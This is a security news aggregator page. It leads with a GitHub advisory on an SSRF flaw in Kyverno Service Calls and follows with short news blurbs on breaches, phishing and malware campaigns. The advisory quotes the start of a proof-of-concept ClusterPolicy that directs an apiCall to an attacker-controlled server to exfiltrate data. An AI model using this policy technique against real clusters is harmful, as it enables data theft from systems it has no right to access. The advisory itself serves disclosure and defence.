Security
Headlines
HeadlinesLatestCVEs

Latest News

GHSA-459x-q9hg-4gpq: Kyverno vulnerable to SSRF via Service Calls

### Summary An attacker with the ability to create Kyverno policies in a Kubernetes cluster can use Service Call functionality to perform SSRF to a server under their control in order to exfiltrate data. ### Details According to the documentation, Service Call is intended to address services located inside the Kubernetes cluster, but this method can also resolve external addresses, which allows making requests outside the Kubernetes cluster. https://kyverno.io/docs/writing-policies/external-data-sources/#variables-from-service-calls ### PoC Create a slightly modified Cluster Policy from the documentation. In the url we specify the address of a server controlled by the attacker, for example Burp Collaborator. ```yaml apiVersion: kyverno.io/v1 kind: ClusterPolicy metadata: name: check-namespaces spec: rules: - name: call-extension match: any: - resources: kinds: - ConfigMap context: - name: result apiCall: method: P...

ghsa
Open in Source
#git#kubernetes#ssrf
Operation BULUT: Encrypted Chats from Sky ECC, ANOM Lead to 232 Arrests

Intelligence from encrypted platforms like Sky ECC and ANOM has led to the arrest of 232 individuals and…

Max Severity Bug in Apache Roller Enabled Persistent Access

The remediated flaw gave adversaries a way to maintain access to the app through password resets.

With AI's Help, Bad Bots Are Taking Over the Web

Bad bots are becoming increasingly difficult to detect as they more easily mimic human behaviors and utilize evasion techniques, researchers say.

AI-Powered Presentation Tool Leveraged in Phishing Attacks

Researchers at Abnormal Security said threat actors are using a legitimate presentation and graphic design tool named "Gamma" in phishing attacks.

Best Crypto Tax Software in 2025: A Comprehensive Guide

Keeping up with crypto tax laws in Europe feels like a constant hurdle. Regulations evolve, tax authorities demand…

4chan Breached? Hacker from Rival Soyjak Forum Claims Source Code Leak

4chan is down amid claims from a rival Soyjak forum user who says they’ve breached the site and…

Suspected 4chan Hack Could Expose Longtime, Anonymous Admins

Though the exact details of the situation have not been confirmed, community infighting seems to have spilled out in a breach of the notorious image board.

Hertz Falls Victim to Cleo Zero-Day Attacks

Customer data such as birth dates, credit card numbers, and driver's license information were stolen when threat actors exploited zero-day vulnerabilities in Cleo-managed file-transfer products.

Fake PDFCandy File Converter Websites Spread Malware

CloudSEK uncovers a sophisticated malware campaign where attackers impersonate PDFCandy.com to distribute the ArechClient2 information stealer. Learn how…